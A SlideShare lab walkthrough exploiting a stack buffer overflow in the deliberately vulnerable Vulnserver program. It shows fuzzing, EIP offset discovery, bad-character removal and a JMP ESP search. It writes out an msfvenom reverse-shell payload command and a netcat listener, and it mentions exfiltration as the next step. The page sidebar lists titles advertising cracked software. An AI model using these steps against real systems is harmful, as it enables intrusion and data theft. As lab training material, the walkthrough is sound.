SlideShare a Scribd company logo

Vulnserver bufferoverflow

E
Eric alleshouse

This is my walkthrough on exploiting a buffer overflow vulnerability within the Vulnserver application.

1 of 15
Downloaded 27 times
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow Eric Alleshouse -- Independent Security Researcher ralleshouse@gmail.com April 20 2017 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 1
Table of Contents How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow……………....……………….……………………....……...1 Introduction…………………………………….……………………………..3 Lab setup……………………………….………………………………3 Immunity configuration………………..…….…………………………..….4 Simple buffer test…………………………….……………………………....5 Nmap scan……………………………………………………………………..6 Crashing the program…………………………………………………….….7 A unique string ………………………………………………………….…....7 Pattern Offset………………………………………………………….….…...9 The bytearray…………………………………………………………..……..10 Truncation………………...………………………………………………..….11 JMP ESP….……………………………....………..…………………….…....12 The final Exploit compiled ...…………………………………………...….13 Shell received ……………………………………………..………………....14 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 2
**A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to ‘Try Harder’ at succeeding with this project and to produce this report. ** Introduction Vulnserver is an intentionally vulnerable program introduced by Stephen Bradshaw in 2010. It serves the purpose of providing a place for him to improve his coding abilities, and test various shellcode and for other exploits. He encourages others to find exploits in the server, but for the purpose of this document, I will focus on flooding the memory buffer with a malicious shellcode which will allow me access to the Windows machine through a shell on my Kali OS. Vulnserver can be downloaded ​here. Lab setup I’m using the VirtualBox hypervisor with a Kali 4.6.4 and Windows 7/IE 8 virtual machines. Installed on the Windows machine is the SLmail pop server and immunity debugger with the mona.py script inserted into the python commands folder within Immunity debugger. The firewall in Windows has been turned off to simulate a possible real world simulation of security misconfiguration. Perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that represent a How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 3
misconfiguration. This exercise shows a consequence of failing to audit a system resulting in an exploit of the system and exposure to sensitive files. Vulnserver can be downloaded from https://github.com/stephenbradshaw/vulnserver Kali can be downloaded from ​http://www.kali.org Immunity debugger: ​https://www.immunityinc.com/products/debugger/index.html Virtualbox: ​https://www.virtualbox.org/wiki/Downloads Mona.py (which is inserted into the commands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ Once the VM’s are set up, I made sure the VM’s are on the ‘host only’ network so they are kept from being exposed to the internet. The Vm’s should be on the same network and able to ping each other. As a side note, my host operating system is a MacBook Pro, and I have found a limitation for drag and drop between host and guest, so the workaround to this is to create a shared folder on the host that is accessible to the vm’s. Netcat will also work to transfer files, but takes a little more time to set up because it is not a native program within Windows. The goal of the exercise is to redirect the EIP memory address to a JMP ESP address leading the execution flow to a shellcode which I injected into memory. Within Immunity debugger, set the working folder to c:logs by issuing the command: !mona config -set workingfolder c:logs All created documents from Mona will be found there. First, I need to verify the crash of the application by using a poc.py script to fuzz the application. The exploit variable will send 2500 ‘A’s to verify that the program is vulnerable to a memory stack overflow. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 4
2500 ‘A’s sent to the server Here is a snapshot of the the whole exploit to start with. It is written in python and imports the socket module to make a connection to the remote Vulnserver. It will send 2500 ‘A’s along with the ‘TRUN’ command which the server is vulnerable to. The server ip reflects the ip address of my windows machine where vulnserver resides and the port it uses is 9999, which I found from a simple nmap scan of the ip address. . Initial exploit How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 5
Nmap scan of the windows machine After running this program from the Kali terminal, the result shows that the program crashes and ESP contains many ‘A’s or ‘41’ in hex. This shows that the boundary hasn’t been checked as I can inject my own data into the program and cause it to crash. Each time the program is crashed, the Vulnserver needs to be restarted, and it’s process attached to Immunity. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 6
In order to find the specific location of ESP, a unique string needs to be sent to the program and the offset address located from the debugger. Use the Immunity command !mona pc 2500 (to create a unique string of characters. There is also a tool within Kali in the directory which does the same thing located in: /usr/share/metasploit-framework/tools/exploit/pattern_create Copy the unique string into the simple program and send it to the vulnserver. ie.exploit = 'Aa0Aa1Aa2Aa....' instead of the ‘A’s The unique pattern string will be found in the c:logs working folder after using the mona command. Or from Kali How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 7
Note the exploit was changed from ‘A’s to the unique string created. Then it was sent to the vulnserver to crash again. After the system crashes, locate the position of EIP. The memory address in this case is 396f4338 as indicated by immunity debugger. To find this, Issue the Immunity command !mona po 396f4338 to find the location of EIP (or use the Kali tool /usr/share/metasploit_framework/tools/exploit/pattern_offset -q 396f4338 to find it's location) eg. !mona po 396f4338 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 8
The Pattern Offset was found at position 2006 so the exploit will get changed to offset = 'A'*2006. EIP will be the next 4 bytes in memory, so the pattern offset now becomes 'A'*2006 + 'B'*4 (run the script to verify control of the EIP by noting that 4 ‘B’s get written to the EIP register. You can see the 4 ‘B’s at the end of the ‘A’s. This is where your JMP ESP will go a little later. EIP has 4 ‘B’s written to it Use Immunity !mona bytearray to create a list of all the possible hex characters. The file will be saved to c:logs. Copy the string into the program and send this in place of the offset to view any truncation caused by other bad characters, and eliminate them one by one until a clean set of characters is able to be passed to the program without issue. Below is illustrated all possible hex characters.It is important to remove these bad characters so that the shellcode will be run successfully. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 9
Send the bytearray from the exploit : offset = 'A'*2006 + ‘B’*4 + badchars to see if there is any truncation caused by characters from the array. The picture with truncation happening shows that the 00 character is causing problems afterward indicated by a bunch of 00’s . How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 10
Truncation No more truncation after the 00 byte is removed After bad characters x00 is removed there is no more truncation. The hex string is successfully inserted to the memory buffer without problems. This byte will be excluded when creating the shellcode with msfvenom later on in the exercise. Use Immunity !mona modules -o (to find the modules compatible with dlls within Vulnserver to exploit. ASLR and DEP randomize memory addresses of the JMP ESP and are used for security purposes and modules should not be selected that have these functions active. There are instances where they are not used because of common program instructions needing to use them. I chose essfunc.dll. The -o option filters out the operating system modules to whittle the module list to relevant listings.) How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 11
Use Immunity !mona find -s 'xffxe4' -m .dll (to find the location of a JMP ESP location) I verify the address contains a jmp esp by searching that memory address in the debugger The JMP ESP in my case is located at 625011af. Written in little endian format, it will become 'xafx11x50x62' in the exploit. (I replace the 'B' with JMP ESP address in little endian format! Since I control EIP, I can direct it to go to the JMP ESP address, slide down some no-operation instructions and fall into the malicious shellcode. To create a payload in Kali without the bad characters and insert this as a variable in the script, I type: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.102 LPORT=443 -f py -a x86 --platform windows -b 'x00' The exploit becomes exploit = offset + JMP ESP + nops + buff (offset is the memory just before EIP) (JMP ESP is the address location of EIP) (buf was the shellcode created in kali which contains my reverse tcp shell. In this case there is just a snip of the shell code) (nops are sent to create a little space and be sure that the shellcode gets run in the memo How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 12
Final exploit How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 13
. Setup a netcat listener in Kali so the Windows machine has a place to connect to. nc -lvp 443 Send the exploit ./poc.py to Vulnserver A shell is gained on the compromised Windows machine by exploiting a vulnerability in the Vulnserver programming. There was no boundary check to the user input, so I was able to make the program crash and gain entry to the system. The next phase of the process is Post exploitation where I can perform data exfiltration and more laterally through various machines on the network. Other useful information can be gained from other computers, printers, and routers. System information gathered How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 14
How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 15
Ad

Recommended

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
amiable_indian
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
Reverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniquesReverse engineering - Shellcodes techniques
Reverse engineering - Shellcodes techniques
Eran Goldstein
 
From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!
Rodolpho Concurde
 
The 3 VS Threading Rules
The 3 VS Threading RulesThe 3 VS Threading Rules
The 3 VS Threading Rules
aarnott
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Security Applications For Emulation
Security Applications For EmulationSecurity Applications For Emulation
Security Applications For Emulation
Silvio Cesare
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentals
Eran Goldstein
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Positive Hack Days
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
Martin Hron
 
Audit
AuditAudit
Audit
Mark Ellzey Thomas
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret
Karel Javůrek
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigation
Yaniv Shani
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
Bryce Kunz
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
Animesh Roy
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with ValgrindBetter Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Rigels Gordani
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 
Slmail Buffer Overflow
Slmail Buffer OverflowSlmail Buffer Overflow
Slmail Buffer Overflow
Eric alleshouse
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
D4rk357 a
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
Andrey Karpov
 
Ad

More Related Content

What's hot (19)

Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Security Applications For Emulation
Security Applications For EmulationSecurity Applications For Emulation
Security Applications For Emulation
Silvio Cesare
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentals
Eran Goldstein
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Positive Hack Days
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
Martin Hron
 
Audit
AuditAudit
Audit
Mark Ellzey Thomas
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret
Karel Javůrek
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigation
Yaniv Shani
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
Bryce Kunz
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
Animesh Roy
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with ValgrindBetter Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Rigels Gordani
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 
Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Security Applications For Emulation
Security Applications For EmulationSecurity Applications For Emulation
Security Applications For Emulation
Silvio Cesare
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
Reverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentalsReverse engineering – debugging fundamentals
Reverse engineering – debugging fundamentals
Eran Goldstein
 
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware TriageЭкспресс-анализ вредоносов / Crowdsourced Malware Triage
Экспресс-анализ вредоносов / Crowdsourced Malware Triage
Positive Hack Days
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
sponsorAVAST-VB2014
sponsorAVAST-VB2014sponsorAVAST-VB2014
sponsorAVAST-VB2014
Martin Hron
 
Audit
AuditAudit
Audit
Mark Ellzey Thomas
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret2014 en breaking_av_software_joxeankoret
2014 en breaking_av_software_joxeankoret
Karel Javůrek
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigation
Yaniv Shani
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
Bryce Kunz
 
Intimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit FrameworkIntimacy with MSF - Metasploit Framework
Intimacy with MSF - Metasploit Framework
Animesh Roy
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with ValgrindBetter Embedded 2013 - Detecting Memory Leaks with Valgrind
Better Embedded 2013 - Detecting Memory Leaks with Valgrind
Rigels Gordani
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 

Similar to Vulnserver bufferoverflow (20)

Slmail Buffer Overflow
Slmail Buffer OverflowSlmail Buffer Overflow
Slmail Buffer Overflow
Eric alleshouse
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
D4rk357 a
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
Andrey Karpov
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Tamas K Lengyel
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Evgeni Tsonev
 
Linux synchronization tools
Linux synchronization toolsLinux synchronization tools
Linux synchronization tools
mukul bhardwaj
 
Testing Terraform
Testing TerraformTesting Terraform
Testing Terraform
Nathen Harvey
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
Venkat Raman
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
Finding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-StudioFinding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-Studio
PVS-Studio
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
PVS-Studio
 
PVS-Studio Meets Octave
PVS-Studio Meets Octave PVS-Studio Meets Octave
PVS-Studio Meets Octave
PVS-Studio
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
JongWon Kim
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
Tamas K Lengyel
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysis
Tamas K Lengyel
 
CVE-2014-4113
CVE-2014-4113CVE-2014-4113
CVE-2014-4113
Rajivarnan (Rajiv)
 
Slmail Buffer Overflow
Slmail Buffer OverflowSlmail Buffer Overflow
Slmail Buffer Overflow
Eric alleshouse
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
D4rk357 a
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
Andrey Karpov
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Tamas K Lengyel
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
Evgeni Tsonev
 
Linux synchronization tools
Linux synchronization toolsLinux synchronization tools
Linux synchronization tools
mukul bhardwaj
 
Testing Terraform
Testing TerraformTesting Terraform
Testing Terraform
Nathen Harvey
 
Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1Boot-To-Root KIOPTRIX Level -1
Boot-To-Root KIOPTRIX Level -1
Venkat Raman
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
Finding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-StudioFinding bugs in the code of LLVM project with the help of PVS-Studio
Finding bugs in the code of LLVM project with the help of PVS-Studio
PVS-Studio
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
PVS-Studio
 
PVS-Studio Meets Octave
PVS-Studio Meets Octave PVS-Studio Meets Octave
PVS-Studio Meets Octave
PVS-Studio
 
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitPenetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
JongWon Kim
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
Tamas K Lengyel
 
BSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysisBSides Denver: Stealthy, hypervisor-based malware analysis
BSides Denver: Stealthy, hypervisor-based malware analysis
Tamas K Lengyel
 
CVE-2014-4113
CVE-2014-4113CVE-2014-4113
CVE-2014-4113
Rajivarnan (Rajiv)
 
Ad

Recently uploaded (20)

Expand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchangeExpand your AI adoption with AgentExchange
Expand your AI adoption with AgentExchange
Fexle Services Pvt. Ltd.
 
WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)WinRAR Crack for Windows (100% Working 2025)
WinRAR Crack for Windows (100% Working 2025)
sh607827
 
Not So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java WebinarNot So Common Memory Leaks in Java Webinar
Not So Common Memory Leaks in Java Webinar
Tier1 app
 
Automation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath CertificateAutomation Techniques in RPA - UiPath Certificate
Automation Techniques in RPA - UiPath Certificate
VICTOR MAESTRE RAMIREZ
 
Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025Avast Premium Security Crack FREE Latest Version 2025
Avast Premium Security Crack FREE Latest Version 2025
mu394968
 
Revolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptxRevolutionizing Residential Wi-Fi PPT.pptx
Revolutionizing Residential Wi-Fi PPT.pptx
nidhisingh691197
 
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025Why Orangescrum Is a Game Changer for Construction Companies in 2025
Why Orangescrum Is a Game Changer for Construction Companies in 2025
Orangescrum
 
Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]Get & Download Wondershare Filmora Crack Latest [2025]
Get & Download Wondershare Filmora Crack Latest [2025]
saniaaftab72555
 
Top 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docxTop 10 Client Portal Software Solutions for 2025.docx
Top 10 Client Portal Software Solutions for 2025.docx
Portli
 
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage DashboardsAdobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
Adobe Marketo Engage Champion Deep Dive - SFDC CRM Synch V2 & Usage Dashboards
BradBedford3
 
Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025
kashifyounis067
 
How can one start with crypto wallet development.pptx
How can one start with crypto wallet development.pptxHow can one start with crypto wallet development.pptx
How can one start with crypto wallet development.pptx
laravinson24
 
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Mastering Fluent Bit: Ultimate Guide to Integrating Telemetry Pipelines with ...
Eric D. Schabell
 
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdfMicrosoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdf
TechSoup
 
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
How Valletta helped healthcare SaaS to transform QA and compliance to grow wi...
Egor Kaleynik
 
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
How to Batch Export Lotus Notes NSF Emails to Outlook PST Easily?
steaveroggers
 
Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025Adobe Master Collection CC Crack Advance Version 2025
Adobe Master Collection CC Crack Advance Version 2025
kashifyounis067
 
Kubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptxKubernetes_101_Zero_to_Platform_Engineer.pptx
Kubernetes_101_Zero_to_Platform_Engineer.pptx
CloudScouts
 
